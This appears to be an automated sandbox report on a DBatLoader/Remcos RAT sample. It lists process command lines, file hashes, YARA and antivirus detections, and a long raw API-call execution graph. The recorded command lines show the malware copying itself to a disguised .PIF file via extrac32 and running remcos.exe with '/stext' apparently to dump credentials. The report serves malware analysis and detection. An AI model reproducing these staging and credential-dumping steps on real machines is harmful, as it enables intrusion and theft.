                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                                                                                                                                                  Imagebase:0xa40000
                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:07:20:34
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF
                                                                                                                                                  Imagebase:0x2d0000
                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                  MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:07:20:35
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.3821247162.0000000002DF1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                  • Detection: 73%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:07:20:39
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:07:20:43
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\Public\Libraries\Cmzcxhwn.PIF
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.1533650563.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                                                  • Detection: 73%, Virustotal, Browse
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:07:20:45
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:15
                                                                                                                                                  Start time:07:20:51
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:16
                                                                                                                                                  Start time:07:20:53
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000010.00000002.1649498271.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:07:21:02
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:18
                                                                                                                                                  Start time:07:21:11
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\Users\Public\Libraries\Cmzcxhwn.PIF
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000012.00000002.1789281992.0000000002D51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:07:21:20
                                                                                                                                                  Start date:24/04/2024
                                                                                                                                                  Path:C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:1'639'424 bytes
                                                                                                                                                  MD5 hash:DA7C2473B5C455F25F420827AF596286
                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Has exited:true


                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:5.7%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:9.7%
                                                                                                                                                    Total number of Nodes:1258
                                                                                                                                                    Total number of Limit Nodes:25
                                                                                                                                                    execution_graph: interactive node/edge graph (entry node 2e01ac0; API calls observed along the traced paths include QueryPerformanceCounter, GetTickCount, InetIsOffline, LoadLibraryW, GetModuleHandleW, GetModuleHandleA, GetProcAddress, VirtualProtect, VirtualAlloc and Sleep). The raw node/edge dump behind the graph widget is not reproduced here.
2de16f5 VirtualFree 84185->84187 84188 2de1b61 Sleep 84186->84188 84186->84190 84189 2de170d 84187->84189 84188->84180 84189->84127 84191 2de1c00 VirtualFree 84190->84191 84192 2de1ba4 84190->84192 84191->84127 84192->84127 84194 2de1681 84193->84194 84195 2de164d 84193->84195 84194->84169 84195->84194 84196 2de164f Sleep 84195->84196 84197 2de1664 84196->84197 84197->84194 84198 2de1668 Sleep 84197->84198 84198->84195 84203 2de1560 84199->84203 84201 2de15d4 VirtualAlloc 84202 2de15eb 84201->84202 84202->84175 84204 2de1500 84203->84204 84204->84201 84205 2e0a2f4 84215 2de6530 84205->84215 84209 2e0a322 84220 2e09b3c timeSetEvent 84209->84220 84211 2e0a32c 84212 2e0a33a GetMessageA 84211->84212 84213 2e0a34a 84212->84213 84214 2e0a32e TranslateMessage DispatchMessageA 84212->84214 84214->84212 84216 2de653b 84215->84216 84221 2de415c 84216->84221 84219 2de4270 SysAllocStringLen SysFreeString SysReAllocStringLen 84219->84209 84220->84211 84222 2de41a2 84221->84222 84223 2de43ac 84222->84223 84224 2de421b 84222->84224 84226 2de43dd 84223->84226 84230 2de43ee 84223->84230 84235 2de40f4 84224->84235 84240 2de4320 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 84226->84240 84229 2de43e7 84229->84230 84231 2de4433 FreeLibrary 84230->84231 84232 2de4457 84230->84232 84231->84230 84233 2de4466 ExitProcess 84232->84233 84234 2de4460 84232->84234 84234->84233 84236 2de4137 84235->84236 84237 2de4104 84235->84237 84236->84219 84237->84236 84239 2de15cc VirtualAlloc 84237->84239 84241 2de582c 84237->84241 84239->84237 84240->84229 84242 2de583c GetModuleFileNameA 84241->84242 84243 2de5858 84241->84243 84245 2de5a90 GetModuleFileNameA RegOpenKeyExA 84242->84245 84243->84237 84246 2de5b13 84245->84246 84247 2de5ad3 RegOpenKeyExA 84245->84247 84263 2de58cc 12 API calls 84246->84263 84247->84246 84248 2de5af1 RegOpenKeyExA 84247->84248 84248->84246 84250 2de5b9c lstrcpynA GetThreadLocale GetLocaleInfoA 84248->84250 84252 2de5cb6 84250->84252 84253 2de5bd3 84250->84253 
84251 2de5b38 RegQueryValueExA 84254 2de5b76 RegCloseKey 84251->84254 84255 2de5b58 RegQueryValueExA 84251->84255 84252->84243 84253->84252 84257 2de5be3 lstrlenA 84253->84257 84254->84243 84255->84254 84258 2de5bfb 84257->84258 84258->84252 84259 2de5c48 84258->84259 84260 2de5c20 lstrcpynA LoadLibraryExA 84258->84260 84259->84252 84261 2de5c52 lstrcpynA LoadLibraryExA 84259->84261 84260->84259 84261->84252 84262 2de5c84 lstrcpynA LoadLibraryExA 84261->84262 84262->84252 84263->84251 84264 156b4887 84265 156b4893 ___scrt_is_nonwritable_in_current_image 84264->84265 84291 156b4596 84265->84291 84267 156b489a 84269 156b48c3 84267->84269 84579 156b49f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 84267->84579 84270 156b4902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 84269->84270 84580 156c4251 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 84269->84580 84275 156b4962 84270->84275 84582 156c33e7 35 API calls 3 library calls 84270->84582 84272 156b48dc 84274 156b48e2 ___scrt_is_nonwritable_in_current_image 84272->84274 84581 156c41f5 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 84272->84581 84302 156b4b14 84275->84302 84292 156b459f 84291->84292 84587 156b4c52 IsProcessorFeaturePresent 84292->84587 84294 156b45ab 84588 156b8f31 10 API calls 4 library calls 84294->84588 84296 156b45b0 84297 156b45b4 84296->84297 84589 156c40bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84296->84589 84297->84267 84299 156b45bd 84300 156b45cb 84299->84300 84590 156b8f5a 8 API calls 3 library calls 84299->84590 84300->84267 84591 156b6e90 84302->84591 84305 156b4968 84306 156c41a2 84305->84306 84593 156cf059 84306->84593 84308 156b4971 84311 1568e9c5 84308->84311 84310 156c41ab 84310->84308 84597 156c6815 35 API calls 84310->84597 84599 1569cb50 LoadLibraryA 
GetProcAddress 84311->84599 84313 1568e9e1 GetModuleFileNameW 84604 1568f3c3 84313->84604 84315 1568e9fd 84619 156820f6 84315->84619 84318 156820f6 28 API calls 84319 1568ea1b 84318->84319 84625 1569be1b 84319->84625 84323 1568ea2d 84651 15681e8d 84323->84651 84325 1568ea36 84326 1568ea49 84325->84326 84327 1568ea93 84325->84327 84856 1568fbb3 116 API calls 84326->84856 84657 15681e65 84327->84657 84330 1568eaa3 84334 15681e65 22 API calls 84330->84334 84331 1568ea5b 84332 15681e65 22 API calls 84331->84332 84333 1568ea67 84332->84333 84857 15690f37 36 API calls __EH_prolog 84333->84857 84335 1568eac2 84334->84335 84662 1568531e 84335->84662 84338 1568ead1 84667 15686383 84338->84667 84339 1568ea79 84858 1568fb64 77 API calls 84339->84858 84343 1568ea82 84859 1568f3b0 70 API calls 84343->84859 84579->84267 84580->84272 84581->84270 84582->84275 84587->84294 84588->84296 84589->84299 84590->84297 84592 156b4b27 GetStartupInfoW 84591->84592 84592->84305 84594 156cf062 84593->84594 84596 156cf06b 84593->84596 84598 156cef58 48 API calls 5 library calls 84594->84598 84596->84310 84597->84310 84598->84596 84600 1569cb8f LoadLibraryA GetProcAddress 84599->84600 84601 1569cb7f GetModuleHandleA GetProcAddress 84599->84601 84602 1569cbb8 44 API calls 84600->84602 84603 1569cba8 LoadLibraryA GetProcAddress 84600->84603 84601->84600 84602->84313 84603->84602 84898 1569b4a8 FindResourceA 84604->84898 84608 1568f3ed _Yarn 84910 156820b7 84608->84910 84611 15681fe2 28 API calls 84612 1568f413 84611->84612 84613 15681fd8 11 API calls 84612->84613 84614 1568f41c 84613->84614 84615 156bbd51 ___std_exception_copy 21 API calls 84614->84615 84616 1568f42d _Yarn 84615->84616 84916 15686dd8 84616->84916 84618 1568f460 84618->84315 84620 1568210c 84619->84620 84621 156823ce 11 API calls 84620->84621 84622 15682126 84621->84622 84623 15682569 28 API calls 84622->84623 84624 15682134 84623->84624 84624->84318 84953 156820df 84625->84953 84627 1569be2e 84631 1569bea0 84627->84631 84639 
15681fe2 28 API calls 84627->84639 84642 15681fd8 11 API calls 84627->84642 84646 1569be9e 84627->84646 84957 156841a2 28 API calls 84627->84957 84958 1569ce34 28 API calls 84627->84958 84628 15681fd8 11 API calls 84629 1569bed0 84628->84629 84630 15681fd8 11 API calls 84629->84630 84632 1569bed8 84630->84632 84959 156841a2 28 API calls 84631->84959 84635 15681fd8 11 API calls 84632->84635 84637 1568ea24 84635->84637 84636 1569beac 84638 15681fe2 28 API calls 84636->84638 84647 1568fb17 84637->84647 84640 1569beb5 84638->84640 84639->84627 84641 15681fd8 11 API calls 84640->84641 84643 1569bebd 84641->84643 84642->84627 84960 1569ce34 28 API calls 84643->84960 84646->84628 84648 1568fb23 84647->84648 84650 1568fb2a 84647->84650 84961 15682163 11 API calls 84648->84961 84650->84323 84652 15682163 84651->84652 84656 1568219f 84652->84656 84962 15682730 11 API calls 84652->84962 84654 15682184 84963 15682712 11 API calls std::_Deallocate 84654->84963 84656->84325 84658 15681e6d 84657->84658 84660 15681e75 84658->84660 84964 15682158 22 API calls 84658->84964 84660->84330 84663 156820df 11 API calls 84662->84663 84664 1568532a 84663->84664 84965 156832a0 84664->84965 84666 15685346 84666->84338 84970 156851ef 84667->84970 84856->84331 84857->84339 84858->84343 84899 1568f3de 84898->84899 84900 1569b4c5 LoadResource LockResource SizeofResource 84898->84900 84901 156bbd51 84899->84901 84900->84899 84902 156c6137 84901->84902 84903 156c6175 84902->84903 84905 156c6160 HeapAlloc 84902->84905 84908 156c6149 __Getctype 84902->84908 84920 156c05dd 20 API calls __dosmaperr 84903->84920 84907 156c6173 84905->84907 84905->84908 84906 156c617a 84906->84608 84907->84906 84908->84903 84908->84905 84919 156c2f80 7 API calls 2 library calls 84908->84919 84911 156820bf 84910->84911 84921 156823ce 84911->84921 84913 156820ca 84925 1568250a 84913->84925 84915 156820d9 84915->84611 84917 156820b7 28 API calls 84916->84917 84918 15686dec 84917->84918 84918->84618 84919->84908 84920->84906 
84922 156823d8 84921->84922 84923 15682428 84921->84923 84922->84923 84932 156827a7 11 API calls std::_Deallocate 84922->84932 84923->84913 84926 1568251a 84925->84926 84927 15682520 84926->84927 84928 15682535 84926->84928 84933 15682569 84927->84933 84943 156828e8 28 API calls 84928->84943 84931 15682533 84931->84915 84932->84923 84944 15682888 84933->84944 84935 1568257d 84936 15682592 84935->84936 84937 156825a7 84935->84937 84949 15682a34 22 API calls 84936->84949 84951 156828e8 28 API calls 84937->84951 84940 1568259b 84950 156829da 22 API calls 84940->84950 84942 156825a5 84942->84931 84943->84931 84945 15682890 84944->84945 84946 15682898 84945->84946 84952 15682ca3 22 API calls 84945->84952 84946->84935 84949->84940 84950->84942 84951->84942 84954 156820e7 84953->84954 84955 156823ce 11 API calls 84954->84955 84956 156820f2 84955->84956 84956->84627 84957->84627 84958->84627 84959->84636 84960->84646 84961->84650 84962->84654 84963->84656 84967 156832aa 84965->84967 84966 156832c9 84966->84666 84967->84966 84969 156828e8 28 API calls 84967->84969 84969->84966 84971 156851fb 84970->84971 84980 15685274 84971->84980 84981 15685282 84980->84981 84984 156828a4 22 API calls 84981->84984 85162 2e04efe 85163 2de4824 11 API calls 85162->85163 85164 2e04f1f 85163->85164 85165 2de47b0 11 API calls 85164->85165 85166 2e04f56 85165->85166 85167 2df7be8 17 API calls 85166->85167 85168 2e04f7a 85167->85168 85169 2de4824 11 API calls 85168->85169 85170 2e04f9b 85169->85170 85171 2de47b0 11 API calls 85170->85171 85172 2e04fd2 85171->85172 85173 2df7be8 17 API calls 85172->85173 85174 2e04ff6 85173->85174 85175 2de4824 11 API calls 85174->85175 85176 2e05017 85175->85176 85177 2de47b0 11 API calls 85176->85177 85178 2e0504e 85177->85178 85179 2df7be8 17 API calls 85178->85179 85180 2e05072 85179->85180 85181 2de4824 11 API calls 85180->85181 85182 2e05093 85181->85182 85183 2de47b0 11 API calls 85182->85183 85184 2e050ca 85183->85184 85185 2df7be8 17 API calls 
85184->85185 85186 2e050ee 85185->85186 85187 2de4824 11 API calls 85186->85187 85188 2e0510f 85187->85188 85189 2de47b0 11 API calls 85188->85189 85190 2e05146 85189->85190 85191 2df7be8 17 API calls 85190->85191 85192 2e0516a 85191->85192 85193 2de4824 11 API calls 85192->85193 85194 2e051a4 85193->85194 85890 2dfd318 85194->85890 85197 2de4824 11 API calls 85198 2e05211 85197->85198 85199 2de47b0 11 API calls 85198->85199 85200 2e05248 85199->85200 85201 2df7be8 17 API calls 85200->85201 85202 2e0526c 85201->85202 85203 2de4824 11 API calls 85202->85203 85204 2e0528d 85203->85204 85205 2de47b0 11 API calls 85204->85205 85206 2e052c4 85205->85206 85207 2df7be8 17 API calls 85206->85207 85208 2e052e8 85207->85208 85209 2de4824 11 API calls 85208->85209 85210 2e05309 85209->85210 85211 2de47b0 11 API calls 85210->85211 85212 2e05340 85211->85212 85213 2df7be8 17 API calls 85212->85213 85214 2e05364 85213->85214 85215 2de4824 11 API calls 85214->85215 85216 2e05385 85215->85216 85217 2de47b0 11 API calls 85216->85217 85218 2e053bc 85217->85218 85219 2df7be8 17 API calls 85218->85219 85220 2e053e0 85219->85220 85221 2de4824 11 API calls 85220->85221 85222 2e05401 85221->85222 85223 2de47b0 11 API calls 85222->85223 85224 2e05438 85223->85224 85225 2df7be8 17 API calls 85224->85225 85226 2e0545c 85225->85226 85227 2de4824 11 API calls 85226->85227 85228 2e0547d 85227->85228 85229 2de47b0 11 API calls 85228->85229 85230 2e054b4 85229->85230 85231 2df7be8 17 API calls 85230->85231 85232 2e054d8 85231->85232 85233 2de4824 11 API calls 85232->85233 85234 2e054f9 85233->85234 85235 2de47b0 11 API calls 85234->85235 85236 2e05530 85235->85236 85237 2df7be8 17 API calls 85236->85237 85238 2e05554 85237->85238 85239 2de4824 11 API calls 85238->85239 85240 2e05575 85239->85240 85241 2de47b0 11 API calls 85240->85241 85242 2e055ac 85241->85242 85243 2df7be8 17 API calls 85242->85243 85244 2e055d0 85243->85244 85245 2de4824 11 API calls 85244->85245 85246 2e055f1 85245->85246 
